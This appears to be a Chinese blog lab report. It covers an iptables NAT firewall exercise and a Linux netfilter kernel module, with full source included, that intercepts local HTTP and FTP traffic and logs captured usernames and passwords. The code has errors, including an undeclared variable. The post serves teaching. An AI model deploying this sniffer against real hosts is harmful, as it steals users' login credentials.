iptables/netfilter

最新推荐文章于 2022-05-31 11:17:20 发布
最新推荐文章于 2022-05-31 11:17:20 发布
阅读量170 收藏
点赞数
文章标签: netfilter iptables
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44858076/article/details/112340538
版权

一.iptabes

1.实验目的

  1. 有3台虚拟机,ip地址分别为192.168.200.130,192.168.200.132,192.168.200.134,分别作为内部主机,NAT主机和外部主机
  2. 仅允许外部主机通过指定的端口号访问FTP或者Netcat服务,不允许访问其它任何服务
  3. 允许内部主机访问外部主机的任何服务
  4. 本次实验主机的版本为
    在这里插入图片描述

2.实验内容

设置NAT主机192.168.200.132中的防火墙如下:
在这里插入图片描述
通过ftp指令向192.168.200.132的2577端口发出请求,可以连接到192.168.200.130的ftp服务
在这里插入图片描述
在192.168.200.130开启netcat的1234端口的服务
在这里插入图片描述
可以看到通过192.168.200.132的52577端口成功访问到了192.168.200.130的1234端口
在这里插入图片描述
在这里插入图片描述
但是访问内部主机的其他服务,如ping
在这里插入图片描述
对于内部主机,可以访问外部主机的任何服务:
ftp:
在这里插入图片描述
netcat:

在这里插入图片描述

在这里插入图片描述
ping:
在这里插入图片描述
检查wireshark有:
在这里插入图片描述

二.netfilter

1.实验目的

  1. 通过netfilter的钩子函数,在主机在传输层获取HTTP和FTP的数据包,通过wireshark抓包分析其结构,最后获取指定的数据(登录的账号和密码)。
  2. 此实验的实验版本为:
    在这里插入图片描述
    注:若使用高版本的linux内核,需要修改hook_func的参数以及注册,注销函数(nf_register_hook, nf_register_net_hook)。注册注销函数需要添加一个新参数struct net *net,可以填入&init_net

2.实验代码

lab2_nf.c:

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/netfilter.h>
#include <linux/netfilter_ipv4.h>
#include <linux/skbuff.h>
#include <linux/ip.h>
#include <linux/tcp.h>

static struct nf_hook_ops nfho;
static struct sk_buff *skbuff;
const char *myzoo = "127.0.0.1"; // 16777343,其是127.0.0.1转换成网络字节序后对应的整数


unsigned int hook_func(const struct nf_hook_ops *ops, struct sk_buff *skb, const struct nf_hook_state *state){
    skbuff = skb;
	char *data = NULL;
	char username[4];	//用于存储账号
	char password[4];	//用于存储密码
	int tcp_payload;
	
	if(skbuff == 0){
		printk("Skbuff is empty!\n");
		return NF_ACCEPT;
	}
	
	struct tcphdr *tcph;
	struct iphdr *iph;

	iph = ip_hdr(skbuff);	//有内置函数获取报文的ip首部和tcp首部
	tcph = tcp_hdr(skbuff);
	if(iph->protocol != htons(IPPROTO_TCP)){
		//printk("This is not a TCP!\n");	
	}
	
	if(tcph->dest != htons(80)){
		//printk("This is not a HTTP!\n");	
	}
	
	if(tcph->dest == htons(80)){
		printk("**************************\n");
		printk("This attack is for http!\n");
		
		//ntohs(ip->tot_len) - (ip->ihl<<2) - (tcp->doff<<2);
		tcp_payload = ntohs(iph->tot_len) - (iph->ihl<<2) - (tcph->doff<<2);	

		if(iph->daddr == 16777343){
			printk("Target is myzoo.com!\n");
			data = (char *)((unsigned long)tcph + (unsigned long)(tcph->doff * 4));
			if(strstr(data, ".exe") != NULL){	//检查报文的数据部分,检查是否有.exe文件,若有则丢弃
				printk(".exe files will be droped!\n ");
				return NF_DROP;
			}

			//通过wireshark抓包分析可知,tcp数据长度(tcp payload)为543
			//又可以看到超文本传输协议(Hypertext Transfer Protocol)中的长度为57,因此实际数据开始位置为543-57
			content_length = 57;
			data += (tcp_payload - content_length);		

			//找到http数据部分是否有"login_username",若有,则之后的数据即为账号
			if(!strncmp(data, "login_username", 14)){	
				printk("The target data is:%s\n", data);
				data += 15;
				strncpy(username, data, 3);	
				username[3] = '\0';
				data += 19;		// 检查结构知道,向后推19个字节即为密码的位置
				strncpy(password, data, 3);
				password[3] = '\0';
	
				printk("Username is %s\n", username);		
				printk("Passwd is %s\n", password);
				
			}
			else printk("This is not target data!\n");
			printk("**************************\n\n");
		}
		
		/*if(iph->daddr == 138421962){
			printk("Target is ustc.mail!\n");
			data = (char *)((unsigned long)tcph + (unsigned long)(tcph->doff * 4));
			data += (689 - 83);
			if(!strncmp(data, "locale", 6)){
				printk("The target data is:%s\n", data);
				data += 17;
				strncpy(username, data, 3);
				username[3] = '\0';
				data += 47;
				strncpy(password, data, 3);
				password[3] = '\0';
	

				printk("Username is %s\n", username);		// name + "login_passwd"
				printk("Passwd is %s\n", password);
				
			}
			else printk("This is not target data!\n");
			printk("**************************\n\n");
		}*/
		
		
	}
	
	if(tcph->dest == htons(21)){	//检查是否为ftp报文
		printk("**************************\n");
		printk("This attack is for ftp!\n");
		
		if(iph->daddr == 16777343){
			printk("Target is localhost!\n");
			data = (char *)((unsigned long)tcph + (unsigned long)(tcph->doff * 4));
	
			if(!strncmp(data, "USER", 4)){	//ftp报文数据规整,账号和密码分两次发送
				data += 5;
				printk("The target username is:%s\n", data);
			}
			
			else if(!strncmp(data, "PASS", 4)){
				data += 5;
				printk("The target password is:%s\n", data);
				
			}
			else printk("This is not target data!\n");
			printk("**************************\n\n");
		}
	}
		
	return NF_ACCEPT;
}

int init_module(){
	
        nfho.hook = hook_func;					// 对netfilter选择指定的钩子函数
        
        nfho.hooknum = NF_INET_PRE_ROUTING;		//选择在PREROUTING钩子点对数据进行处理
        nfho.pf = PF_INET;						//选择TCP/IIP协议族
        nfho.priority = NF_IP_PRI_FIRST;		//优先级设置为最高

        nf_register_hook(&nfho);
        return 0;
}

void cleanup_module(void){
        nf_unregister_hook(&nfho);
}

Makefile:

obj-m += lab2_nf.o
all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean

3.实验内容

使用make指令编译内核模块后后加载模块
在这里插入图片描述
查看内核已经加载完毕
在这里插入图片描述
登录本地ftp服务,账号为abc,密码为123
在这里插入图片描述
由dmesg查看内核日志,可以查看打印出的账号和密码
在这里插入图片描述
登录www.myzoo.com网站
在这里插入图片描述
输入帐号为aaa,密码为123,登录后查看内核如下:
在这里插入图片描述
成功获得了登录的帐号和密码

tzy577
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
IPTables工具及其与netfilter关系介绍
瑞风轻拂
09-08 4977
IPTables概述         IPTables是基于Netfilter基本架构实现的一个可扩展的数据报高级管理系统或核外配置工具,利用table、chain、rule三级来存储数据报的各种规则。Netfilter-iptables由两部分组成,一部分是Netfilter的"钩子",另一部分则是知道这些钩子函数如何工作的一套规则--这些规则存储在被称为iptables的数据结构之中。钩子函
netfilter/iptables 简介
weixin_34336526的博客
07-19 196
netfilter 是 Linux 内置的一种防火墙机制,我们一般也称之为数据包过滤机制。iptables 则是一个命令行工具,用来配置 netfilter 防火墙。下图展示了一个带有防火墙的简单网络拓扑结构: 图中的 Linux 主机既充当了路由器的角色,同时又充当了防火墙的角色。本文我们将以该拓扑结构介绍 netfilter/iptables 防火墙中的基本概念和主要功能。说明:本文的演示环...
iptables & netfilter
oneslide
11-03 334
网络包特点 根据网络包特点,网络包经历的阶段也不一样。 网络包 经历阶段 入境网络包,目的地址是本地 PREROUTING -> INPUT 入境网络包,目的地址非本地 PREROUTING -> FORWARD -> POSTROUTING 出境网络包,本地生成 OUTPUT -> POSTROUTING 下图说明了网络包的路径: 内核对这些...
台湾IT的巨作: linux iptables/netfilter的介绍 part1
09-12
台湾IT的巨作: linux iptables/netfilter的介绍 Linux网络安全技术与实现 第二版 ...linux iptables/netfilter/Qos/Policy route/proxy ARP/bridge/IPsec/L2TP的详细介绍 难得的linux IP相关的详细介绍
台湾IT的巨作: linux iptables/netfilter的介绍 part12
09-12
台湾IT的巨作: linux iptables/netfilter的介绍 Linux网络安全技术与实现 第二版 linux iptables/netfilter/Qos/Policy route/proxy ARP/bridge/IPsec/L2TP的详细介绍 难得的linux IP相关的详细介绍 详细的目录...
iptables/netfilter框架分析(图片版)
11-25
iptables/netfilter框架分析的图片说明,详细的解释iptables/netfilter的工作原理,用于学习iptables/netfilter十分有用。
Linux下基于Netfilteriptables防火墙的构建.pdf
09-06
Linux下基于Netfilteriptables防火墙的构建.pdf
Linux防火墙内核中NetfilterIptables的分析.pdf
09-07
Linux防火墙内核中NetfilterIptables的分析.pdf
iptables netfilter 详解中文手册
04-30
学习iptablesnetfilter的好帮手,全中文pdf版本,清晰,一步步教你完全掌握iptables
iptables/netfilter应用总结
weixin_34221073的博客
12-11 105
目录:一、理论部分.二、实验部分. **********************************理论部分**********************************1. 前提知识 任何主机若要与非同网络中的主机通信,则必须将报文发送到默认网关;对Linux而言,IP地址是属于主机(内核中)的,不属于网卡,只要属于当前主机的IP地址间,都可直接响应,不能称为转...
iptablesnetfilter
aoli_shuai的博客
12-18 242
netfilter netfilter 是linux操作系统核心层内部的一个数据包处理模块 netfilterIPtables iptables 的4张表和5条链 4张表:filter 表,nat 表 ,mangle 表 , raw 表 5条链:INPUT , OUTPUT , FIRWARD , PREROUTING , POSTROUTING 这张图,表示了iptables的4张表和5...
iptables/netfilter详解
weixin_33809981的博客
07-25 233
iptables/netfilter详解一、前言1.防火墙(Firewall)是隔离工具;工作于主机或网络的边缘,对经由的报文根据预先定义的规则(识别条件)进行检测, 对于能够被规则匹配到的报文实行某预定义的处理机制的一套组件。 2.防火墙分类: 硬件防火墙:在硬件级别能部分防火墙,另一部分功能基于软件实现; 软件防火墙:应用...
linux netfilter iptables 详解
学习记录
07-14 576
linux 内核通过 netfilter 模块实现网络访问控制功能,在用户层我们可以通过iptables程序对netfilter进行控制管理。 netfilter 可以对数据进行允许、丢弃、修改操作 netfilter 支持通过以下方式对数据包进行分类: 源IP地址 目标IP地址 使用接口 使用协议(TCP、UDP、ICMP等) 端口号 连接状态(NEW、ESTABLISHED、RELATE...
iptables/netfilter介绍、样例实验和配置规则
dhRainer的博客
10-26 631
iptables/netfilter介绍、样例实验和配置规则0x 01 前言0x 02 表,链以及规则1、表(tables)2、链(chains)3、规则(rules)0x 03 利用Iptables进行网络地址转换实例展示1、环境:2、需求描述0x 04 Iptables常见配置命令和操作一、链及NAT的基本操作1、清除所有的规则2、设置链的默认策略。一般有两种方法。3、列出表/链中的所有规...
linux防火墙 iptables/netfilter详解
Cold_mood的博客
08-05 935
iptables/netfilter的工作原理,架构,匹配规则及保存规则
netfilter/iptables简介
weixin_44260459的博客
11-22 259
netfilteriptables是什么关系?常说的iptables里面的表(table)、链(chain)、规则(rule)都是什么东西?本篇将带着这些疑问介绍netfilter/iptables的结构和相关概念,帮助有需要的同学更好的理解netfilter/iptables,为进一步学习使用iptables做准备。 什么是netfilteriptables 用通俗点的话来讲: netfilter指整个项目,不然官网就不会叫www.netfilter.org了。 在这个项目里面,n
iptablesnetfilter的关系、原理和应用
weixin_40354988的博客
05-31 562
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值